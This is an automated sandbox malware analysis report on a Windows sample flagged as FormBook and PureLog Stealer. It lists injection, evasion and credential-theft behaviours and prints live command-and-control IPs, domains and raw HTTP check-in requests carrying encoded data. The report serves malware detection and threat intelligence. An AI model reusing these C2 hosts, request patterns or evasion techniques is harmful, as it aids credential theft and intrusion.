Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
specifications.exe

Overview

General Information

Sample name:specifications.exe
Analysis ID:1565081
MD5:8f233b98037a9f801c3977afe32776a6
SHA1:f4f49244fc94081d79f2f16802441872fa509fb7
SHA256:56074e8ad9bd7ee8b56c2bbd5c826c7bbcb1819dd0145c7a2733b8ce3d78938e
Tags:exeFormbookuser-julianmckein
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • specifications.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\specifications.exe" MD5: 8F233B98037A9F801C3977AFE32776A6)
    • specifications.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\specifications.exe" MD5: 8F233B98037A9F801C3977AFE32776A6)
      • neghZqrDWkxUmu.exe (PID: 5572 cmdline: "C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 7912 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • neghZqrDWkxUmu.exe (PID: 1668 cmdline: "C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8064 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.specifications.exe.a050000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              2.2.specifications.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.specifications.exe.a050000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.specifications.exe.49d24e8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.specifications.exe.49d24e8.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T09:15:53.450775+010028554651A Network Trojan was detected192.168.2.44974123.225.159.4280TCP
                      2024-11-29T09:16:19.613328+010028554651A Network Trojan was detected192.168.2.449786156.232.181.15580TCP
                      2024-11-29T09:16:34.787530+010028554651A Network Trojan was detected192.168.2.449820185.27.134.20680TCP
                      2024-11-29T09:16:59.487231+010028554651A Network Trojan was detected192.168.2.449880104.21.90.13780TCP
                      2024-11-29T09:17:14.845228+010028554651A Network Trojan was detected192.168.2.449917209.74.77.10780TCP
                      2024-11-29T09:17:29.731036+010028554651A Network Trojan was detected192.168.2.449952176.32.38.13080TCP
                      2024-11-29T09:17:44.585535+010028554651A Network Trojan was detected192.168.2.449983161.97.168.24580TCP
                      2024-11-29T09:18:00.879697+010028554651A Network Trojan was detected192.168.2.450017103.75.185.2280TCP
                      2024-11-29T09:18:15.858592+010028554651A Network Trojan was detected192.168.2.450021155.94.253.480TCP
                      2024-11-29T09:18:31.437921+010028554651A Network Trojan was detected192.168.2.450025208.91.197.2780TCP
                      2024-11-29T09:18:47.005824+010028554651A Network Trojan was detected192.168.2.450029217.160.0.20080TCP
                      2024-11-29T09:19:03.384246+010028554651A Network Trojan was detected192.168.2.450033154.70.82.24680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-29T09:16:11.372591+010028554641A Network Trojan was detected192.168.2.449764156.232.181.15580TCP
                      2024-11-29T09:16:14.076000+010028554641A Network Trojan was detected192.168.2.449770156.232.181.15580TCP
                      2024-11-29T09:16:16.857724+010028554641A Network Trojan was detected192.168.2.449775156.232.181.15580TCP
                      2024-11-29T09:16:26.546324+010028554641A Network Trojan was detected192.168.2.449802185.27.134.20680TCP
                      2024-11-29T09:16:29.258911+010028554641A Network Trojan was detected192.168.2.449808185.27.134.20680TCP
                      2024-11-29T09:16:31.874002+010028554641A Network Trojan was detected192.168.2.449814185.27.134.20680TCP
                      2024-11-29T09:16:51.342534+010028554641A Network Trojan was detected192.168.2.449860104.21.90.13780TCP
                      2024-11-29T09:16:54.018391+010028554641A Network Trojan was detected192.168.2.449866104.21.90.13780TCP
                      2024-11-29T09:16:56.777531+010028554641A Network Trojan was detected192.168.2.449872104.21.90.13780TCP
                      2024-11-29T09:17:06.465787+010028554641A Network Trojan was detected192.168.2.449896209.74.77.10780TCP
                      2024-11-29T09:17:09.251168+010028554641A Network Trojan was detected192.168.2.449903209.74.77.10780TCP
                      2024-11-29T09:17:12.133236+010028554641A Network Trojan was detected192.168.2.449911209.74.77.10780TCP
                      2024-11-29T09:17:21.791971+010028554641A Network Trojan was detected192.168.2.449933176.32.38.13080TCP
                      2024-11-29T09:17:24.445342+010028554641A Network Trojan was detected192.168.2.449939176.32.38.13080TCP
                      2024-11-29T09:17:27.059744+010028554641A Network Trojan was detected192.168.2.449947176.32.38.13080TCP
                      2024-11-29T09:17:36.629843+010028554641A Network Trojan was detected192.168.2.449966161.97.168.24580TCP
                      2024-11-29T09:17:39.272034+010028554641A Network Trojan was detected192.168.2.449972161.97.168.24580TCP
                      2024-11-29T09:17:41.927368+010028554641A Network Trojan was detected192.168.2.449977161.97.168.24580TCP
                      2024-11-29T09:17:52.685236+010028554641A Network Trojan was detected192.168.2.450002103.75.185.2280TCP
                      2024-11-29T09:17:55.341486+010028554641A Network Trojan was detected192.168.2.450007103.75.185.2280TCP
                      2024-11-29T09:17:58.013935+010028554641A Network Trojan was detected192.168.2.450012103.75.185.2280TCP
                      2024-11-29T09:18:07.842523+010028554641A Network Trojan was detected192.168.2.450018155.94.253.480TCP
                      2024-11-29T09:18:10.558205+010028554641A Network Trojan was detected192.168.2.450019155.94.253.480TCP
                      2024-11-29T09:18:13.133640+010028554641A Network Trojan was detected192.168.2.450020155.94.253.480TCP
                      2024-11-29T09:18:22.885892+010028554641A Network Trojan was detected192.168.2.450022208.91.197.2780TCP
                      2024-11-29T09:18:25.453892+010028554641A Network Trojan was detected192.168.2.450023208.91.197.2780TCP
                      2024-11-29T09:18:28.111233+010028554641A Network Trojan was detected192.168.2.450024208.91.197.2780TCP
                      2024-11-29T09:18:38.930551+010028554641A Network Trojan was detected192.168.2.450026217.160.0.20080TCP
                      2024-11-29T09:18:41.675299+010028554641A Network Trojan was detected192.168.2.450027217.160.0.20080TCP
                      2024-11-29T09:18:44.336008+010028554641A Network Trojan was detected192.168.2.450028217.160.0.20080TCP
                      2024-11-29T09:18:55.030408+010028554641A Network Trojan was detected192.168.2.450030154.70.82.24680TCP
                      2024-11-29T09:18:57.685346+010028554641A Network Trojan was detected192.168.2.450031154.70.82.24680TCP
                      2024-11-29T09:19:00.357354+010028554641A Network Trojan was detected192.168.2.450032154.70.82.24680TCP
                      2024-11-29T09:19:10.465837+010028554641A Network Trojan was detected192.168.2.450034172.67.216.17380TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: specifications.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://www.5tuohbpzyj9.buzz/abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0Avira URL Cloud: Label: malware
                      Source: http://www.5tuohbpzyj9.buzz/abgi/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: specifications.exeReversingLabs: Detection: 50%
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: specifications.exeJoe Sandbox ML: detected
                      Source: specifications.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specifications.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: neghZqrDWkxUmu.exe, 00000006.00000002.4144559573.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145192109.0000000000D5E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specifications.exe, specifications.exe, 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000007.00000003.2043007374.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000003.2040816792.000000000079A000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdbUGP source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: SearchProtocolHost.pdb source: neghZqrDWkxUmu.exe, 00000006.00000003.1980326179.000000000127C000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_0012C860 FindFirstFileW,FindNextFileW,FindClose,7_2_0012C860
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax7_2_00119EA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then mov ebx, 00000004h7_2_009E04E8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 23.225.159.42:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 156.232.181.155:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49786 -> 156.232.181.155:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 156.232.181.155:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49820 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 156.232.181.155:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49814 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49866 -> 104.21.90.137:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49880 -> 104.21.90.137:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49872 -> 104.21.90.137:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 209.74.77.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49860 -> 104.21.90.137:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49933 -> 176.32.38.130:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49939 -> 176.32.38.130:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49952 -> 176.32.38.130:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49896 -> 209.74.77.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49972 -> 161.97.168.245:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49983 -> 161.97.168.245:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50002 -> 103.75.185.22:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49977 -> 161.97.168.245:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50017 -> 103.75.185.22:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49917 -> 209.74.77.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 154.70.82.246:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50021 -> 155.94.253.4:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 103.75.185.22:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 155.94.253.4:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49966 -> 161.97.168.245:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 103.75.185.22:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50029 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 172.67.216.173:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50033 -> 154.70.82.246:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50025 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 155.94.253.4:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49947 -> 176.32.38.130:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 155.94.253.4:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 154.70.82.246:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 154.70.82.246:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49911 -> 209.74.77.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 208.91.197.27:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.acc888ommodate.xyz
                      Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                      Source: Joe Sandbox ViewASN Name: CAFENETTG CAFENETTG
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /8s5b/?Tr=kdnPUNSPd0&JZOtU=CIoU3XkQQhyfpcUjsw2DsPW4kkmgmyFqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYoVtQCZc0hRmp1UzBtNRjBvgSGCiGnWKebw= HTTP/1.1Host: www.laohub10.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.canadavinreport.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /eaqq/?Tr=kdnPUNSPd0&JZOtU=NxubQmq32TFwA/AheIz76Ea+WQ99/GP2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYoTrL75hLvWNXnWLMBeEVcMza3YNaS2pisc= HTTP/1.1Host: www.ana-silverco.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /8q8w/?JZOtU=oPmfzDvAiIeWP+diGQfRGlPJ8sXtmBaGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8ormKyt2wgYmNmcIv/8C26BoWgGWFvXlTdI6M=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.gadgetre.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /j1io/?Tr=kdnPUNSPd0&JZOtU=G6oz2WtW4adnoUNEj0mDd4tA5mRlmRwrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSatVnWojK2LYHm9HZs6Gkfl13sfdd70mrgRKgs= HTTP/1.1Host: www.acc888ommodate.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                      Source: global trafficHTTP traffic detected: GET /qrcg/?JZOtU=1fKHCnrcuLb+woCt8SH3V6St3YgMZevAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZI8W3E5DqygOdKGokIjk/qmeUzpHsRWuRdGo=&Tr=kdnPUNSPd0 HTTP/1.1Host: www.nb-shenshi.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
